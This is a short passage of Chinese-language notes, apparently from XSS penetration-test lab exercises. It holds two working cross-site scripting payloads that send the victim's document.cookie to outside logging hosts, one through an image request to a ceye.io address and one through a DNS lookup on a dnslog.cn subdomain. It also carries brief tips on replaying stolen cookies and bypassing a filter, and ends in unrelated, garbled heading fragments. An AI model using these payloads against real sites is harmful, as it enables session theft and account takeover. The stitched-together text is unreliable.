pteXSS模擬1?
<script>
var img
=document.createElement("img");img.src="http://xxxxx.ceye.io/log?"+escape(document.coo
kie);document.body.appendChild(img);
</script>
重放加Cookie頭?
pteXSS模擬2
<script type="text/javascript">
var arr=document.cookie.split(/[;=]/);var url="http://"+arr[1]+".e0nv60.dnslog.cn/xxx.png";document.write('<img src="'+url+'"/>');
</script>
提交表單并刷新看dns返回記錄
DNSLog Platform
?pteXSS模擬3
嘗試發現是除了大寫外過濾
Java框架技術-Maven和MyBatis)
)
介紹及實現原理)
